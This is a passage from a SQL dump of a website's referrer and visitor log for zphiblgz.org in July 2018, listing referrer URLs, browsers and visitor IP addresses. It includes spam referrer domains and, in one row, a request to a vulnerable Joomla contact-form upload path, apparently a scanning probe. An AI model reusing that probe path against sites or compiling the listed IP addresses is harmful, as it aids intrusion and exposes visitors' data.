194.30','000',1,0),(33385,'2018-07-18','http://pornoplen.com/','MSIE','Windows','6.0','','46.118.159.228','000',1,0),(33386,'2018-07-18','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.99.55','000',2,0),(33387,'2018-07-18','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','138.68.186.178','000',2,0),(33388,'2018-07-18','https://zphiblgz.org','Chrome','Windows','67.0.3396.87','','80.93.187.145','000',2,0),(33389,'2018-07-18','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(33390,'2018-07-18','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(33391,'2018-07-19','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',1,0),(33392,'2018-07-19','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','MSIE','Unknown','6.0','','46.185.74.243','000',2,0),(33393,'2018-07-19','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(33394,'2018-07-19','http://zphiblgz.org/cache/v12/get_started','Firefox','Windows','3.6.8','','95.45.252.6','000',10,0),(33395,'2018-07-19','http://zphiblgz.org/cache/v12/get_started','Firefox','Windows','3.6.8','','89.234.68.107','000',10,0),(33396,'2018-07-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(33397,'2018-07-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(33398,'2018-07-19','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(33399,'2018-07-19','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',2,0),(33400,'2018-07-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.161.5','000',5,0),(33401,'2018-07-19','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(33402,'2018-07-19','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(33403,'2018-07-19','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',1,0),(33404,'2018-07-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1853.nCr_3QHF55bXuF0qHTxzMuVilcKejmzqzgpmx8uvgVk.bd511c0f8964e5635fcd9da0fe256d94dc0df669&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041OHJBUUtFWFBjRGVHRHdzMlFqSjQ0UEVOZGJpZDE1ZlR3a0JSMF8wM1FxZyws&sign=969f8abf4c22f348071f526314d2eb9a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.55.153.27','000',2,0),(33405,'2018-07-19','http://dosugrostov.site/','MSIE','Windows','4.01','','46.119.124.149','000',1,0),(33406,'2018-07-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(33407,'2018-07-19','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.29','000',1,0),(33408,'2018-07-19','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(33409,'2018-07-19','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','40.77.190.94','000',1,0),(33410,'2018-07-19','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.21','000',1,0),(33411,'2018-07-19','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','MSIE','Windows','6.0','','46.185.74.243','000',3,0),(33412,'2018-07-19','https://impotentik.com/','MSIE','Windows','6.0','','46.118.159.228','000',1,0),(33413,'2018-07-19','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(33414,'2018-07-19','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.30','000',1,0),(33415,'2018-07-19','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.74','000',1,0),(33416,'2018-07-19','https://www.google.com/','Chrome','Windows','67.0.3396.99','','71.244.254.38','000',3,0),(33417,'2018-07-19','https://zphiblgz.org','Safari','Macintosh','11.1.1','','162.129.251.18','000',1,0),(33418,'2018-07-19','https://zphiblgz.org/','Firefox','Linux','57.0','','144.208.121.112','000',1,0),(33419,'2018-07-19','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(33420,'2018-07-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(33421,'2018-07-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(33422,'2018-07-19','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwiBmqH38qvcAhWvs1kKHUnpBAoQFghRMAs&url=https%3A%2F%2Fzphiblgz.org%2Fts_teams%2Flinda-price%2F&usg=AOvVaw3RuXw-9f0aF6bqzB1reEki','MSIE','Windows','11.0','','12.231.215.10','000',2,0),(33423,'2018-07-19','http://03e.info/','MSIE','Windows','6.0','','178.159.37.70','000',6,0),(33424,'2018-07-19','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(33425,'2018-07-19','https://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Chrome','Windows','49.0.2623.112','','178.32.120.124','000',2,0),(33426,'2018-07-19','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.28','000',1,0),(33427,'2018-07-19','https://zphiblgz.org','Firefox','Windows','3.0','','173.249.6.207','000',2,0),(33428,'2018-07-19','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(33429,'2018-07-19','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(33430,'2018-07-19','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',2,0),(33431,'2018-07-19','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','11.1.2','','68.13.251.219','000',6,0),(33432,'2018-07-19','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(33433,'2018-07-19','https://rent2spb.ru/','MSIE','Windows','5.5','','46.119.124.149','000',1,0),(33434,'2018-07-19','https://zphiblgz.org','Firefox','Windows','40.1','','103.221.71.145','000',2,0),(33435,'2018-07-19','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','MSIE','Windows','6.0','','46.119.124.149','000',1,0),(33436,'2018-07-19','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.214.22','000',1,0),(33437,'2018-07-19','https://www.google.com/','Edge','Windows','17.17134','','107.213.78.29','000',4,0),(33438,'2018-07-19','https://tl.rulate.ru/','MSIE','Windows','6.0','','37.115.185.48','000',1,0),(33439,'2018-07-19','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.229','000',1,0),(33440,'2018-07-19','https://zphiblgz.org','Safari','Macintosh','5.0.6','','144.76.168.111','000',1,0),(33441,'2018-07-19','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.18.54','000',2,0),(33442,'2018-07-20','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.35','000',1,0),(33443,'2018-07-20','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','46.101.9.216','000',4,0),(33444,'2018-07-20','http://www.google.com','Firefox','Windows','31.0','','104.247.223.120','000',2,0),(33445,'2018-07-20','http://viagra-soft.ru/','MSIE','Windows','6.0','','178.137.85.122','000',3,0),(33446,'2018-07-20','http://porno-chaman.info/','Opera','Windows','9.0','','46.119.124.149','000',2,0),(33447,'2018-07-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',4,0),(33448,'2018-07-20','https://moinozhki.com/','MSIE','Windows','5.0','','178.137.85.122','000',2,0),(33449,'2018-07-20','https://russian-postindex.ru/','MSIE','Windows','2.0d','','37.115.185.48','000',2,0),(33450,'2018-07-20','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.34','000',1,0),(33451,'2018-07-20','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.191','000',2,0),(33452,'2018-07-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1854.dzOmqLdVe3tj4xzv6nVWzwK6hR0vkK7tIG9l_MBk6Zw.3289b87ef3704e47599d5709cface39de3862b19&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RklGc1hnVjZNNGpTS2M1bUU2X2V5ZGdzQmM1Ti03VkU2Wi04cTVOTEw5Zyws&sign=c91816b28cf77bf1afd388aab657decb&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.89.216','000',2,0),(33453,'2018-07-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1854.h5zFnv9VkRz6UOl5mDvdqI2v13MI6Y-3AnUCKduDtL8.76dfbc07d4eaf0cd152a28b3ca3e0a8aad9a7169&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZVlleWVReUc1UktMUXJtdExucVVoaDZmVnhRQzhjMWZ3c0xrQ1BpQndHZyws&sign=979d0bfeb5ea0ac167cc2fbb3e655dcf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.188.16','000',2,0),(33454,'2018-07-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1854.YYsVXkXIoWCV8N5JtB5bY-3wDtQXmGw15GHIw4QNI10.90eb46f095ecb3b3885e337af537fbb867dac7f0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042N3BVTWtkWTRPOVFmM1ZOTU4wN0lfVWItUnVpa3FocUgyR09TWGlxNDd4Zyws&sign=ae2a909db5a7b32c2e73735bb61eae96&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.64','000',2,0),(33455,'2018-07-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1854.RH65jvd_PjGAho0EsUbLrlg5o13QVTaNNsELOBL-CNY.853adfd8e31dff56ddba60201dcbb77e67ac8eb4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041N0Y1aThUelA5ZUxPSEtaUFpQQmU1ME1wb2E0eUFBNUhOblZOZVNOdW1IQSws&sign=ada743de35a3d2381043a555a11fdd4a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.248','000',2,0),(33456,'2018-07-20','https://zphiblgz.org','Chrome','Chrome OS','67.0.3396.99','','172.58.184.101','000',8,0),(33457,'2018-07-20','http://zphiblgz.org/components/com_sexycontactform/fileupload/index.php','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',2,0),(33458,'2018-07-20','http://mobile.regionshop.biz/','MSIE','Windows','6.0','','46.118.159.228','000',2,0),(33459,'2018-07-20','https://luckybull.io/','Unknown','Unknown','Unknown','','46.118.159.228','000',2,0),(33460,'2018-07-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','51.15.146.39','000',4,0),(33461,'2018-07-20','https://zphiblgz.org','Firefox','Windows','40.1','','39.46.165.82','000',2,0),(33462,'2018-07-20','https://zphiblgz.org','Firefox','Windows','40.1','','109.92.236.152','000',2,0),(33463,'2018-07-20','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','52.165.166.139','000',1,0),(33464,'2018-07-20','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','52.165.150.117','000',1,0),(33465,'2018-07-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(33466,'2018-07-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','37.115.185.236','000',2,0),(33467,'2018-07-20','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(33468,'2018-07-20','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(33469,'2018-07-20','https://zphiblgz.org','Firefox','Macintosh','59.0','','52.165.166.139','000',1,0),(33470,'2018-07-20','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.227','000',1,0),(33471,'2018-07-20','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(33472,'2018-07-20','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',2,0),(33473,'2018-07-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.114','000',1,0),(33474,'2018-07-20','http://technika-remont.ru/','Opera','Windows','9.00','','178.137.85.122','000',2,0),(33475,'2018-07-20','https://zphiblgz.org','MSIE','Windows','11.0','','188.240.208.26','000',2,0),(33476,'2018-07-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','218.66.74.239','000',1,0),(33477,'2018-07-20','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33478,'2018-07-20','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(33479,'2018-07-20','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(33480,'2018-07-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(33481,'2018-07-20','http://search.myway.com/search/GGmain.jhtml?n=7848DF10&p2=%5EBX2%5Expu171%5ES26316%5Eus&ptb=41508182-E330-432A-9629-CD5BD4EF6E01&qs=&si=govforms-2-s&ss=sub&st=tab&trs=wtt&tpr=sbt&enc=2&searchfor=ZI2JyoGK7tkjmSCltE1vhVrY5KBdBBNPvrivb31tHtJbQY_h7IGchzEgQirftf5ylOWNZuoCG7IkMSkdDpLfborAFJtAdZcagpkGBBhxAr1ZIXfwgKOnSQw1ft_aWXl6glMzX0e5TLmFRFrwOBb1-LYfo65rPAA4HHFaDUPI8NMBOzTQzZbDvbTnDAYlSuOSLmFUnd8PGwllsUcLtpkqtsKGPWDJO0iz7ep5IYjvnRKcji63RaeHilKw1tud3BpvfktImx2jBX57ZcHZ1zxYYUTGCwTH1cE9WRPHXyRghuN7NRih0hnVFRwwaAOtxk5MCqEkKNGxAlveKsmP_P5EnA&ts=1532140938733','MSIE','Windows','11.0','','71.204.220.225','000',8,0),(33482,'2018-07-20','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(33483,'2018-07-20','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(33484,'2018-07-20','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.210.228.156','000',1,0),(33485,'2018-07-20','https://zphiblgz.org','Opera','Windows','8.50','','192.210.228.156','000',1,0),(33486,'2018-07-20','http:// www.zphiblgz.org','Chrome','Windows','62.0.3202.75','','34.211.47.61','000',2,0),(33487,'2018-07-20','https:// zphiblgz.org','Firefox','Windows','55.0','','34.211.47.61','000',1,0),(33488,'2018-07-20','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','166.62.126.3','000',2,0),(33489,'2018-07-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.174.95','000',12,0),(33490,'2018-07-20','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.174.95','000',1,0),(33491,'2018-07-20','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.144','000',2,0),(33492,'2018-07-21','https://bpro1.top/','Opera','Windows','6.0','','46.185.74.243','000',3,0),(33493,'2018-07-21','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(33494,'2018-07-21','zphiblgz.org','Safari','Windows','537.13','','94.23.204.36','000',1,0),(33495,'2018-07-21','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','40.77.188.166','000',1,0),(33496,'2018-07-21','http://zphiblgz.org/download/aarc/','Opera Next','Windows','49.0.2725.47','','195.184.208.199','000',1,0),(33497,'2018-07-21','http://03e.info/','MSIE','Windows','6.0','','178.159.37.70','000',6,0),(33498,'2018-07-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(33499,'2018-07-21','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(33500,'2018-07-21','https://www.souvenirua.com/uk/','MSIE','Windows','6.0','','178.137.85.122','000',4,0),(33501,'2018-07-21','https://zphiblgz.org/ts_teams/jelani-dula/','AppleWebKit','Windows','534','','40.77.178.103','000',1,0),(33502,'2018-07-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1855.PQ4r4gwDlplHqa7bKcam7HitSHk3myHr6cyn4Ct6ywE.f1768e58f9becd301a5f63b9b1687b4f7cf1a341&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043cXhTblpLZTBmcmxXRFNBZFZzd3NzOVVYaUh4a0xNOXlrdVVMVmtRRkF5dyws&sign=8e2adedaa1ff08a345720b8637ccfbc8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.37.125','000',2,0),(33503,'2018-07-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1855.5sBeeyhNcN4fdCqqHGZYEDuB4oYbzEhhUpZgPYeEqkA.85f0a51818e82b185d24b649d17350ab546f441b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040VXdXajhRQUtkMEo1U2xhMXY3Ti1hSjdSTmFudXJBRFA4bWw0THlIc1RZdyws&sign=8854f0480358c9a5c43a7fe4e8bdbffe&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.165.96','000',2,0),(33504,'2018-07-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1855.5kF615zLQvjTFrji88pgZ7w8qrUlJiRYTk2x_a8bxZQ.e5057b8f8cfa353baba41368a4bafae8f82fbaec&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041aHNaNmlXWDFnTHpGWHk4NXFjTkhMeXM5dlFjVWpyeFRqUW54ZTNuNVAydyws&sign=0d4c9ce885fe251d43f50679ba0798d7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.174.84','000',2,0),(33505,'2018-07-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1855.uzxnppxoVKIZktlXEdqM01eukgqNSXOr6tiVM_U9RSI.5cf121a9a14a07e2f9b4dda7a83b60db8d871ddc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Yl9OQ0p6Si16Y2tXdVdzVEZ6RVhvNVRzQ1RPQ2NGMG9YbDl6bGZ0OFRaUSws&sign=d2e2a22bf3893be9ea4f591e263a69e5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.132','000',2,0),(33506,'2018-07-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1855.bHFc55T34SiW1GmE8bRLW6sVRH2ggAf3uOb0lbDEFX8.03d438d97a9fedc002a977c7bd048ba4f2f794e9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TEZ2eTI2S1laVzJseEN5S2JXLWs0TUtlVElUY0owTVZLd2FlamlTOU1idyws&sign=495cc27c8f568fa7e5e97b693118a583&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(33507,'2018-07-21','https://rent2spb.ru/','MSIE','Windows','5.0','','46.119.124.149','000',1,0),(33508,'2018-07-21','http://metallosajding.ru/','MSIE','Windows','5.5','','46.118.159.228','000',1,0),(33509,'2018-07-21','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.171.130','000',1,0),(33510,'2018-07-21','http://www.zphiblgz.org/','Chrome','Windows','66.0.3359.117','','107.6.171.132','000',1,0),(33511,'2018-07-21','https://zphiblgz.org','Safari','iPhone','11.0','','174.235.145.197','000',3,0),(33512,'2018-07-21','http://ruspoety.ru/','MSIE','Windows','6.0','','46.185.74.243','000',3,0),(33513,'2018-07-21','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.41','000',1,0),(33514,'2018-07-21','http://03e.info/','Opera','Windows','8.00','','46.119.124.149','000',1,0),(33515,'2018-07-21','http://zphiblgz.org/','Firefox','Windows','47.0','','185.99.97.18','000',2,0),(33516,'2018-07-21','https://www.google.com/','Safari','iPhone','11.0','','99.203.27.231','000',2,0),(33517,'2018-07-21','https://tl.rulate.ru/','Opera','Windows','9.00','','37.115.185.48','000',3,0),(33518,'2018-07-21','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(33519,'2018-07-21','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.35','000',1,0),(33520,'2018-07-21','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(33521,'2018-07-21','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(33522,'2018-07-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(33523,'2018-07-21','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.28','000',1,0),(33524,'2018-07-21','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(33525,'2018-07-21','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(33526,'2018-07-21','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','144.138.251.17','000',2,0),(33527,'2018-07-21','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(33528,'2018-07-21','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','216.54.91.66','000',1,0),(33529,'2018-07-21','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(33530,'2018-07-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(33531,'2018-07-21','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(33532,'2018-07-21','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','23.229.14.231','000',1,0),(33533,'2018-07-21','https://zphiblgz.org','Opera','Windows','8.50','','23.229.14.231','000',1,0),(33534,'2018-07-21','http://mobile.regionshop.biz/','MSIE','Windows','6.0','','46.118.159.228','000',2,0),(33535,'2018-07-21','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.219.255.248','000',2,0),(33536,'2018-07-21','http://medicineseasybuy.com/','Opera','Windows','7.54','','46.119.124.149','000',1,0),(33537,'2018-07-21','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','54.244.107.99','000',3,0),(33538,'2018-07-21','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','178.137.88.27','000',2,0),(33539,'2018-07-21','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','34.217.108.24','000',2,0),(33540,'2018-07-21','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.227.19','000',2,0),(33541,'2018-07-22','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.85','000',1,0),(33542,'2018-07-22','https://www.google.gr/','Safari','iPhone','11.0','','5.144.212.26','000',1,0),(33543,'2018-07-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(33544,'2018-07-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1856.H-RvlZsr63mQq0jRszNuDRzaQoXRnhqdyqhfOz7b2ZI.4fc8a56445d199d14cc0d982bfedcc96b9975342&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ckVtQkEzOEFiWXVYdTczRGNVRmlBMm1hbzJaeThUNFAxUFpVTGMtRFdPZyws&sign=76f6feaf694358b27e55ff08ebe1ac4a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.76.129.35','000',2,0),(33545,'2018-07-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1856.euQtHVl0ejhhGsAg1tVhYvEUto64TFU8JUbzNCDSfDA.daeb7a69278f4694f00accdf0bac35390e8c31a1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043MDI4dEJvU2JHWFBWZnVEZFlEQ2ViQmdLVVA1aTAzNGgzdnhac01nV2dkZyws&sign=12d9f47969b1707f01564be49e9c5442&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.189.44','000',2,0),(33546,'2018-07-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1856.xqOZp9T6_KaPnsqanzmxWTcOKplfi9JPan_dTSv1hjA.1df30195236eb40e0aee3264844afe7525cdc871&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041STFOdl9oSE1NTExNc1lvNFZGTXNETEJDbUxSSGhEeUZfaGlRSEVlMHFoUSws&sign=ddffe537d3013c5b1b290404678a24a9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.213.18.70','000',2,0),(33547,'2018-07-22','https://allergija.com/','Opera','Windows','8.00','','46.118.159.228','000',2,0),(33548,'2018-07-22','https://zphiblgz.org','Firefox','Windows','40.1','','107.130.157.186','000',2,0),(33549,'2018-07-22','http://skinali.photo-clip.ru/','Opera','Windows','8.01','','37.115.185.48','000',1,0),(33550,'2018-07-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.44','000',2,0),(33551,'2018-07-22','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.67','000',1,0),(33552,'2018-07-22','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.202','000',6,0),(33553,'2018-07-22','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.215','000',2,0),(33554,'2018-07-22','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.199','000',2,0),(33555,'2018-07-22','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.208','000',3,0),(33556,'2018-07-22','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.203','000',2,0),(33557,'2018-07-22','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.218','000',1,0),(33558,'2018-07-22','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.108','000',3,0),(33559,'2018-07-22','https://zphiblgz.